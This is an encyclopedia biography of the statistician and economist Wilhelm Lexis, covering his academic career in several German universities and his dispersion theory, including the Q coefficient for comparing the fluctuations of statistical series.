            feed_dict={box_list_ph: boxarr})

One thing to note about the code above is that there are two separate parts using with tf.device statements. The first part's device argument can be replaced with a GPU. However, the second part cannot: if you try, you will run into an error because the GPU kernels cannot work with these int types. That is why the second part needs to run on the CPU.

The same can be done using numpy, which is useful when one does not wish to use TensorFlow for getting the IOU matrix.

import numpy as np

def calculate_iou_matrix(box_arr1, box_arr2):
    x11, y11, x12, y12 = np.split(box_arr1, 4, axis=1)
    x21, y21, x22, y22 = np.split(box_arr2, 4, axis=1)
    xA = np.maximum(x11, np.transpose(x21))
    yA = np.maximum(y11, np.transpose(y21))
    xB = np.minimum(x12, np.transpose(x22))
    yB = np.minimum(y12, np.transpose(y22))
    interArea = np.maximum((xB - xA + 1e-9), 0) * np.maximum((yB - yA + 1e-9), 0)
    boxAArea = (x12 - x11 + 1e-9) * (y12 - y11 + 1e-9)
    boxBArea = (x22 - x21 + 1e-9) * (y22 - y21 + 1e-9)
    iou = interArea / (boxAArea + np.transpose(boxBArea) - interArea)
    return iou
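As a small usage example (my own addition, with made-up box coordinates), the numpy version can be used to drop near-duplicate boxes: a box is kept only if its IOU against every previously kept box stays at or below the threshold.

    import numpy as np

    def drop_duplicate_boxes(boxes, threshold=0.8):
        iou = calculate_iou_matrix(boxes, boxes)
        keep = []
        for i in range(len(boxes)):
            # keep box i unless it overlaps an already-kept box too much
            if all(iou[i, j] <= threshold for j in keep):
                keep.append(i)
        return boxes[keep]

    boxes = np.array([[0.10, 0.10, 0.40, 0.40],
                      [0.11, 0.10, 0.41, 0.40],   # near-duplicate of the first box
                      [0.60, 0.60, 0.90, 0.90]])
    print(drop_duplicate_boxes(boxes))            # first and third boxes survive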
2023-02-03 17:46:17
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6884349584579468, "perplexity": 6270.542686779195}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764500058.1/warc/CC-MAIN-20230203154140-20230203184140-00435.warc.gz"}
https://scicomp.stackexchange.com/questions/29344/how-does-one-calculate-reaction-force-in-fea
# How does one calculate reaction force in FEA?

I wrote a UEL (User Element in Abaqus) for one element and compared it to a reference UEL which used standard FEM. The results agreed satisfactorily, except for the reaction force. The stress, strain, and strain energy were all pretty accurate. I am unable to understand how the reaction force is calculated. I am simply restraining the element at the bottom (two nodes) and applying displacement (incrementally) at the top (two nodes). As far as I know, the stiffness matrix is used to calculate reaction forces in these cases, and the stiffness values are quite similar in my UEL and the FEM UEL. Also, if this were the cause, the other parameters wouldn't have had the same values. I would be grateful if anybody could help me figure this out.

• Welcome to Scicomp! This question is better-suited for an abaqus-specific forum or for the abaqus support team. They will know the specific internals of the abaqus solver, and for this reason, application-specific questions are generally regarded as off-topic here. If, however, your question is about the mathematics behind FEM, then rephrasing the question in this way is more likely to be on-topic here. – Tyler Olsen Apr 21 '18 at 2:32
• Thanks for the comment! I will try to rephrase the question since it is mostly about the mathematics/mechanics behind the FEA procedure. – Schneider Apr 21 '18 at 15:43

To calculate the reaction forces at a node, Abaqus (or any structural FE code) simply sums the internal forces for all elements attached to that node. The reaction forces are the negative of that sum. For an Abaqus user element, the internal forces for the element are returned from subroutine UEL in the RHS array. The returned stiffness matrix (Jacobian), AMATRX, is not used in the reaction force calculations. Of course, for a simple linear element, the internal force vector will equal the negative of the product of the element stiffness matrix and the nodal displacement vector.

• note that with one element and all displacement bc's you could return a completely wrong rhs and it will not cause any issue except giving the bad value as a reaction force. – george Apr 21 '18 at 13:13
• @george: How would that be possible? That all other possible parameters are correctly output but only the reaction force is wrong? I mean, the RHS is used in each iteration for calculations, right? Then how are the other values correct? – Schneider Apr 21 '18 at 15:40
• @Bill Greene: This problem involves a non-linear element; there are basically two elements defined in the UEL, and I calculate the RHS as the product of the transpose of the B matrix with the stress vector. – Schneider Apr 21 '18 at 15:51
• with displacement boundary conditions on every node in the model the solver doesn't do anything with the rhs vector. You really should be using some force conditions to test your uel. (I would recommend testing in a model mixed with some standard elements as well) – george Apr 21 '18 at 17:33
• Thanks for your comments! I did run a test with more than one element; there the UEL failed to show convergence! It didn't even converge for the first increment! The strange thing is that the RHS values provided by my UEL and the FEM one are almost identical. – Schneider Apr 21 '18 at 17:39

Once the solution of the problem is known, i.e.
you know the displacement vector, then to calculate the reaction/internal forces the integral

$$\mathbf{f}^\textrm{int} = \sum_{e=1}^{n_e} \int_\Omega \mathbf{B}^\textrm{T}{\boldsymbol\sigma}(\boldsymbol\varepsilon)\,\textrm{d}\Omega = \sum_{e=1}^{n_e} \sum_{i=1}^{n_g} j_i w_i \left( \mathbf{B}_i^\textrm{T}{\boldsymbol\sigma}(\boldsymbol\varepsilon_i) \right)$$

is evaluated, where $j_i$ and $w_i$ are the Jacobian and the integration weight, respectively, and $\mathbf{B}_i$ is the differential operator evaluated at integration point $i$, such that

$$\boldsymbol\varepsilon_i = \mathbf{B}_i\mathbf{u}^e,$$

where $\mathbf{u}^e$ is the vector of nodal degrees of freedom on element $e$. The elements of the vector $\mathbf{f}^\textrm{int}$ at constrained degrees of freedom are the reaction forces. The equations above are general; they apply to both linear and nonlinear problems. To make this work you need to provide a physical (constitutive) equation, for example in a UMAT, i.e.

$${\boldsymbol\sigma} = {\boldsymbol\sigma}( \boldsymbol\varepsilon ).$$

• Just wanted to verify something I discussed in the previous answer as well. Suppose I am using displacement boundary conditions only. In my model (one element), two nodes are fixed and the other two nodes have a fixed displacement (applied incrementally), so the only output variable to be compared (with another reference code with the same boundary conditions) is the internal force (or reaction force), since all the displacements are known; every other parameter such as strain, stress, and strain energy would anyway be the same? – Schneider Apr 23 '18 at 0:32
• Yes. You can check if $K u - f^\textrm{int} = 0$, and the energy, which should be $E=\frac{1}{2} u f^\textrm{int}$. – likask Apr 23 '18 at 7:23
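To make the answers above concrete, here is a minimal NumPy sketch for a single 2-node linear bar element; the material constants and displacements are invented for illustration. It checks the point made in the comments: for a linear element, $K u$ equals the internal force vector $B^\mathrm{T}\sigma$ integrated over the element, and the entry at the constrained degree of freedom gives the reaction (up to the sign convention mentioned in the first answer).

    import numpy as np

    E, A, L = 200e9, 1e-4, 2.0          # Young's modulus, area, length (assumed)
    B = np.array([-1.0 / L, 1.0 / L])   # strain-displacement operator, 2-node bar
    u = np.array([0.0, 1e-3])           # nodal displacements; first node is fixed

    eps = B @ u                          # strain at the single integration point
    sig = E * eps                        # linear elastic constitutive law
    f_int = B * sig * A * L              # B^T sigma integrated over the element

    K = E * A / L * np.array([[1.0, -1.0], [-1.0, 1.0]])
    print(np.allclose(K @ u, f_int))     # True: K u = f_int for a linear element
    print(f_int[0])                      # internal force at the constrained dof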
2020-02-21 02:54:37
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 3, "x-ck12": 0, "texerror": 0, "math_score": 0.7613461017608643, "perplexity": 745.661638789477}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-10/segments/1581875145438.12/warc/CC-MAIN-20200221014826-20200221044826-00007.warc.gz"}
https://cs.stackexchange.com/questions/66280/what-is-extended-polynomials/66292
What is "extended polynomials"

I've heard that the functions definable in the simply-typed $\lambda$-calculus are exactly the class of extended polynomials. However, it is still not clear to me what exactly extended polynomials are. Could someone explain that to me? Some pointers would be good as well. Thanks.

It turns out the definition is straightforward, as seen in [1]. And as an example, exponentiation is not definable in the simply-typed $\lambda$-calculus.
2023-03-22 15:15:07
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8721926212310791, "perplexity": 369.59228628922074}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943845.78/warc/CC-MAIN-20230322145537-20230322175537-00359.warc.gz"}
https://space.stackexchange.com/questions/27843/is-there-really-a-frozen-lake-near-the-equator-on-mars
# Is there really a frozen lake near the equator on Mars?

Figure 1. Views of plate-like terrain on Mars, and pack-ice on Earth. From the paper linked below. a, Part of an HRSC image of Mars from orbit 32, with a resolution of 13.7 m per pixel, centred at 5.5° north latitude and 150.4° east longitude, showing plate-like deposits with signs of break-up, rotation and lateral movement to the west-southwest in the lower part of the image. Scale bar is 25 km. b, Synthetic Aperture Radar image of pack-ice in the Weddell Sea, Antarctica. Scale bar is 25 km. (ESA image, processed by H. Rott.) c, Enlarged view of a raft 7 × 12 km showing 8° rotation anticlockwise, causing the clear lane downstream of island 'I' to be curved. Leads 'L' downstream of the crater and small island at lower right are almost straight, indicating unidirectional drift slightly north of westward. Note pressure ridges 'P' upstream of islands. Arrows show relative motion vectors of individual plates. Scale bar is 10 km.

In Murray et al. (2005), published in the journal Nature under the significant title "Evidence from the Mars Express High Resolution Stereo Camera for a frozen sea close to Mars' equator", images from the above-named camera are presented from which the existence of a frozen body of water, with surface pack-ice, is inferred around $5^\circ$ north latitude and $150^\circ$ east longitude in the Cerberus Palus region. The frozen lake would measure about 800 x 900 km in lateral extent!

Have there been observations by any radar instrument or neutron detector that can confirm or invalidate the existence of the putative frozen lake in the Cerberus Palus region? And is there further evidence from high resolution cameras for the existence of ice deposits within this region since the publication of the article in 2005? For example, evidence of ice surface lowering and of plain-like features draping over partly submerged craters.

• What does the article say about that? It's paywalled so we can't read it. Currently it looks like you're just assuming there have been no SHARAD observations. – Hobbes Jun 13 '18 at 11:50
• You don't explore with radar, the SHARAD instrument's already done its job. Perhaps the question should be what the next step is, how it would be validated. – GdD Jun 13 '18 at 11:54
• @Hobbes You can read it if you crash the paywall! I've changed the last question somewhat. – Conelisinspace Jun 13 '18 at 12:20
• What are the results of neutron scattering from Cerberus Palus? Neutrons are an indicator of the amount of hydrogen in the soil, and hydrogen means water. – Heopps Jun 13 '18 at 13:26
• @Conelisinspace yes, but I meant that if the ice is deeper, neutrons don't show it. Radar has deeper penetration. – Heopps Jun 13 '18 at 15:44
2019-10-19 22:34:35
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.31262218952178955, "perplexity": 3673.5402181333006}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570986700435.69/warc/CC-MAIN-20191019214624-20191020002124-00559.warc.gz"}
http://n-gage-center.de/quasar-gaming/supermartingale.php
# Supermartingale

Definition. Let $(\Omega, \mathcal{F}, P)$ be a probability triple and $\{\mathcal{F}_t\}$ be a filtration on $\mathcal{F}$. A stochastic process $X$ is an $\{\mathcal{F}_t\}$-supermartingale if: (i) $X$ is adapted to $\{\mathcal{F}_t\}$; (ii) $E[|X_t|] < \infty$ for all $t$; (iii) $E[X_t \mid \mathcal{F}_s] \le X_s$ for all $s \le t$.

Submartingales and supermartingales; examples. Definition: Let $\{X_t,\, t\ge 0\}$ be a stochastic process over the underlying probability space. If it satisfies the inequality $E[X_t \mid \mathcal{F}_s] \le X_s$, it is called a supermartingale. An important result is Jensen's inequality. Theorem: If $X_n$ is a martingale and $\varphi(x)$ is a convex function of $x$, then $Y_n = \varphi(X_n)$ is a submartingale.

Definition 1: A martingale is an integrable adapted process satisfying $E[X_t \mid \mathcal{F}_s] = X_s$ for all $s \le t$. That is, the conditional expected value of the next observation, given all the past observations, is equal to the most recent observation. This therefore describes a fair game.

Consider a Wiener process. Whereas constructing examples of local martingales which are not martingales is a relatively straightforward exercise, such examples are often slightly contrived, and the martingale property fails for obvious reasons. This would indeed follow if it was known that the process is a martingale, as is often assumed to be true for stochastic integrals with respect to Brownian motion. In fact, the corresponding inequality can be shown to hold almost surely for all times. Then, analogously to the computation above, the result is a martingale, showing that the process in question is a local martingale.
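The defining properties are easy to see in simulation. The following short sketch (my own illustration, with arbitrary parameters) checks the martingale property for a symmetric random walk, where the conditional mean of the next value equals the current one, and shows that subtracting a deterministic drift yields a supermartingale, where the conditional mean is smaller.

    import numpy as np

    rng = np.random.default_rng(0)
    n_paths, n_steps = 100000, 10
    steps = rng.choice([-1.0, 1.0], size=(n_paths, n_steps))
    X = np.cumsum(steps, axis=1)              # symmetric random walk: a martingale

    sel = X[:, 4] == 1.0                       # condition on X_5 = 1
    print(X[sel, 5].mean())                    # ~1.0: E[X_6 | X_5 = 1] = X_5

    Y = X - 0.1 * np.arange(1, n_steps + 1)    # negative drift: a supermartingale
    print(Y[sel, 4].mean(), Y[sel, 5].mean())  # ~0.5 vs ~0.4: conditional mean drops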
2018-03-24 10:09:05
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9011728763580322, "perplexity": 2349.9360146325134}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-13/segments/1521257650188.31/warc/CC-MAIN-20180324093251-20180324113251-00127.warc.gz"}
https://socratic.org/questions/if-a-current-of-3-a-passing-through-a-circuit-generates-3-w-of-power-what-is-the
# If a current of 3 A passing through a circuit generates 3 W of power, what is the resistance of the circuit?

$\frac{1}{3}\ \Omega$

The relationship between the power $P$ generated, the resistance $R$ of a circuit, and the current $I$ flowing through it is given by

$P = I^2 R$

So, $R = \dfrac{P}{I^2} = \dfrac{3}{3^2} = \dfrac{1}{3}\ \Omega$.
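A one-line check of the arithmetic (my own illustrative snippet):

    # P = I^2 * R, so R = P / I^2
    I, P = 3.0, 3.0
    print(P / I**2)   # 0.333..., i.e. 1/3 ohm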
2022-01-28 00:18:57
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 6, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4596675634384155, "perplexity": 659.5518797014726}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320305317.17/warc/CC-MAIN-20220127223432-20220128013432-00571.warc.gz"}
https://www.studysmarter.us/textbooks/physics/modern-physics-2nd-edition/statistical-mechanics/41e-show-that-the-rms-speed-of-a-gas-molecule-defined-as-is-/
Exercise 41E, found on page 405 of Modern Physics, 2nd Edition, by Randy Harris (633 pages, ISBN 9780805303087).

# Show that the rms speed of a gas molecule, defined as $v_{\mathrm{rms}}\equiv\sqrt{\overline{v^2}}$, is given by $\sqrt{\dfrac{3k_BT}{m}}$.

The rms speed of a gas molecule is $\sqrt{\dfrac{3k_BT}{m}}$.

## Step 1: Maxwell probability distribution

$$v_{\mathrm{rms}}=\sqrt{\overline{v^2}}=\left(\int_0^\infty v^2 P(v)\,\mathrm{d}v\right)^{1/2}\qquad(1)$$

where $P(v)$ is the Maxwell probability distribution, given by

$$P(v)=\left(\frac{m}{2\pi k_BT}\right)^{3/2}4\pi v^2 e^{-\frac{mv^2}{2k_BT}}\qquad(2)$$

Here $m$ is the mass of the particle, $v$ is the speed of the particle, and $k_B$ is the Boltzmann constant.

## Step 2: Determine the rms speed of the gas

$$v_{\mathrm{rms}}=\left(\int_0^\infty v^2\left(\frac{m}{2\pi k_BT}\right)^{3/2}4\pi v^2 e^{-\frac{mv^2}{2k_BT}}\,\mathrm{d}v\right)^{1/2}$$

Let $b=\dfrac{1}{2a^2}=\dfrac{m}{2k_BT}$. Then

$$v_{\mathrm{rms}}=\left(4\pi\left(\frac{b}{\pi}\right)^{3/2}\int_0^\infty v^4 e^{-bv^2}\,\mathrm{d}v\right)^{1/2}=\left(4\pi\left(\frac{b}{\pi}\right)^{3/2}\frac{3}{8}\sqrt{\frac{\pi}{b^5}}\right)^{1/2}=\left(\frac{3}{2b}\right)^{1/2}=\sqrt{\frac{3k_BT}{m}}$$

Therefore, the rms speed of a gas molecule is $\sqrt{\dfrac{3k_BT}{m}}$.
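The Gaussian moment used in Step 2 is the only nontrivial ingredient, and it can be checked symbolically. Below is a small SymPy sketch (my own verification, not part of the textbook solution) confirming both the integral and the final result.

    import sympy as sp

    v, b, m, kB, T = sp.symbols('v b m k_B T', positive=True)

    # The moment used in Step 2: integral of v^4 exp(-b v^2) over (0, oo)
    print(sp.integrate(v**4 * sp.exp(-b * v**2), (v, 0, sp.oo)))  # 3*sqrt(pi)/(8*b**(5/2))

    # Full calculation of v_rms from the Maxwell distribution (2)
    P = (m / (2 * sp.pi * kB * T))**sp.Rational(3, 2) * 4 * sp.pi * v**2 \
        * sp.exp(-m * v**2 / (2 * kB * T))
    vrms = sp.sqrt(sp.integrate(v**2 * P, (v, 0, sp.oo)))
    print(sp.simplify(vrms))                                      # sqrt(3)*sqrt(T*k_B/m)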
2023-03-24 23:11:20
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 25, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.965787410736084, "perplexity": 2708.4645810158872}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945289.9/warc/CC-MAIN-20230324211121-20230325001121-00405.warc.gz"}
http://eptcs.web.cse.unsw.edu.au/paper.cgi?ACT2020.16
## Proof Theory of Partially Normal Skew Monoidal Categories

Tarmo Uustalu, Niccolò Veltri, Noam Zeilberger

The skew monoidal categories of Szlachányi are a weakening of monoidal categories where the three structural laws of left and right unitality and associativity are not required to be isomorphisms but merely transformations in a particular direction. In previous work, we showed that the free skew monoidal category on a set of generating objects can be concretely presented as a sequent calculus. This calculus enjoys cut elimination and admits focusing, i.e. a subsystem of canonical derivations, which solves the coherence problem for skew monoidal categories. In this paper, we develop sequent calculi for partially normal skew monoidal categories, which are skew monoidal categories with one or more structural laws invertible. Each normality condition leads to additional inference rules and equations on them. We prove cut elimination and we show that the calculi admit focusing. The result is a family of sequent calculi between those of skew monoidal categories and (fully normal) monoidal categories. On the level of derivability, these define 8 weakenings of the (unit,tensor) fragment of intuitionistic non-commutative linear logic.

In David I. Spivak and Jamie Vicary: Proceedings of the 3rd Annual International Applied Category Theory Conference 2020 (ACT 2020), Cambridge, USA, 6-10th July 2020, Electronic Proceedings in Theoretical Computer Science 333, pp. 230–246. Published: 8th February 2021. ArXived at: http://dx.doi.org/10.4204/EPTCS.333.16
2022-08-13 12:58:13
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8053088784217834, "perplexity": 1542.3560606550989}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571950.76/warc/CC-MAIN-20220813111851-20220813141851-00652.warc.gz"}
https://encyclopediaofmath.org/wiki/Lexis,_Wilhelm
# Lexis, Wilhelm

This article on Wilhelm Lexis was adapted from an original article by Sébastien Hertz, which appeared in StatProb: The Encyclopedia Sponsored by Statistics and Probability Societies (source: http://statprob.com/encyclopedia/WilhelmLEXIS.html). The original article is copyrighted by the author(s); it has been donated to the Encyclopedia of Mathematics, and its further issues are under the Creative Commons Attribution Share-Alike License. All pages from StatProb are contained in the Category StatProb.

Wilhelm LEXIS, b. 17 July 1837, d. 24 August 1914.

Summary. In a hostile Germanic environment Lexis established statistics as a highly mathematical subject based on the probability calculus, by means of his dispersion theory.

Wilhelm Lexis, the son of a physician, was born in Eschweiler near Aachen, in Germany. He studied at the University of Bonn from 1855, first devoting himself to law, and later to mathematics and the natural sciences. He was awarded his doctorate in philosophy in 1859 for a thesis on analytical mechanics. For some time, he taught secondary school mathematics at the Bonn Gymnasium. He also held a job in the Bunsen chemical laboratory in Heidelberg.

Lexis' departure for Paris in 1861 marked a turning point in his career. It was there that he developed his interest in the social sciences and political economy, as well as familiarizing himself with the works of Quetelet (q.v.). His first major work, published in Bonn in 1870, was a detailed study of the evolution of France's foreign trade after the restoration of the monarchy (Die Ausfuhrprämien im Zusammenhang mit der Tarifgeschichte und Handelsentwicklung Frankreichs seit der Restauration). In it Lexis stressed the importance of basing economic theories on quantitative data, while not hesitating to make use of mathematics.

The Franco-Prussian war of 1870-71 forced him to return to Germany. While editing the Amtliche Nachrichten für Elsass-Lothringen at Hagenau, then the seat of the general government of Alsace-Lorraine, he befriended Friedrich Althof, who was to become director of higher education in the Prussian Ministry of Education and Culture. This friendship was at the basis of Lexis' active participation in the exchange of ideas and reforms of German universities. In the autumn of 1872, he was very appropriately appointed professor extraordinarius (Associate Professor) in political economy at the newly created University of Strasbourg, then one semester old, where Althof was also teaching. It was in the same year that he took part in the formation of the Verein für Sozialpolitik, a movement of university members (the Kathedersozialisten), an offshoot of the historical school whose aim was the promotion of social politics. It was in the Alsatian capital that he wrote his impressive introduction to the theory of statistical demography, Einleitung in die Theorie der Bevölkerungsstatistik, published in 1875. By then he had already left Strasbourg for Dorpat, but not without recognition by the award of a Doctor rerum politicorum honoris causa in 1874. In Dorpat (now Tartu in Estonia), a town in the Russian Empire where the language of university instruction was German till 1895, he held the Chair as full professor in Geography, Ethnography and Statistics. He spent only two years there, returning to the banks of the Rhine as Chair of Political Economy at the University of Freiburg im Breisgau from 1876 to 1884. This was undoubtedly his most productive period.
His publications of the time, most of them appearing in the Jahrbücher für Nationalökonomie und Statistik, of which he was chief editor from 1891, propelled him to the front rank in the field of theoretical statistics, and revealed him as the leader of a group working on the application of the calculus of probabilities to statistical data. Lexis simultaneously continued his research in political economy, editing the first German encyclopedia of economic and social sciences, the Handwörterbuch der Staatswissenschaften. He was particularly expert in the field of finance, publishing his Erörterungen über die Währungsfragen, among other works, in 1881.

In 1884, he resigned his Chair in Freiburg for the Chair of Statistics (Staatswissenschaften) at the University of Breslau (now Wroclaw in Poland). Finally, in 1887, he moved to Göttingen, where he held the Chair of Statistics until his death, a few days after the start of the First World War. Bortkiewicz (q.v.) was his student in Göttingen in 1892. In 1895, Lexis founded the first actuarial institute in Germany (Königliches Seminar für Versicherungswissenschaften), which trained its candidates in both political economy and mathematics. His scholarship in both fields allowed him to manage its direction, and to provide part of the teaching in economics and statistics, while G. Bohlmann took charge of the teaching of mathematics.

Lexis left his mark on the history of statistics through his pioneering work on dispersion, which led on to the analysis of variance. Lexis' plan was to measure and compare the fluctuations of different statistical time series. In a sense, he followed Quetelet in applying urn models to statistical series. But by stressing fluctuations, he corrected Quetelet's work, which aimed to set every series within a unique "normal" model by assuming, quite erroneously, their homogeneity and stability. Similarly, using a binomial urn model to represent the annual number of male births, he derived a dispersion coefficient $Q$ (in homage to Quetelet) which is the ratio of the empirical variance of the series considered to the assumed theoretical variance. An analogous coefficient of divergence had been independently constructed by the French actuary Emile Dormoy in 1874. In the ideal case, Lexis refers to a "normal" dispersion when the fluctuations are purely due to chance, and the coefficient is equal to 1. But in most cases the coefficient is different from 1, and thus differs from the binomial model; the fluctuations then indicate a "physical" rather than a chance component. Lexis classified these dispersions into two categories, "hypernormal" and "hyponormal", according as $Q > 1$ or $Q < 1$. He also showed that series of social data usually have a hypernormal dispersion. His studies on the ratio of sexes at birth and his stability theory of statistical series, with his famous $Q$ coefficient of dispersion, were re-examined in his large treatise entitled "Abhandlungen zur Theorie der Bevölkerungs- und Moralstatistik" (1903). In a review of it, Bortkiewicz in 1904 concludes that "(Lexis) has known how to clarify and synthesize the most general problems of moral and demographic statistics, insofar as their conditions, methods and tasks are concerned; he has also shown that if this science has had to renounce its status as 'social physics' to which Quetelet tried to raise it, it remains nevertheless far more than the simple social accounting which some modern, and excessively timid, practitioners of the discipline would have us believe."
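The dispersion coefficient just described is easy to experiment with numerically. Below is a minimal Python sketch of the ratio Lexis proposed: the empirical variance of a set of observed proportions divided by the binomial variance expected under pure chance. The helper name, the sample sizes, and the use of the mean trial count are illustrative assumptions, not Lexis' exact small-sample conventions; for a purely binomial series the ratio should come out close to 1, his "normal" dispersion.

    import numpy as np

    def lexis_q(successes, trials):
        # Ratio of the empirical variance of the observed proportions to the
        # binomial variance expected under pure chance ("normal" dispersion).
        p = successes / trials
        p_bar = successes.sum() / trials.sum()
        return np.var(p, ddof=1) / (p_bar * (1.0 - p_bar) / trials.mean())

    rng = np.random.default_rng(1)
    n = np.full(30, 10000.0)                                 # 30 "years" of 10000 births
    k = rng.binomial(10000, 0.514, size=30).astype(float)    # male-birth counts, pure chance
    print(lexis_q(k, n))                                     # close to 1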
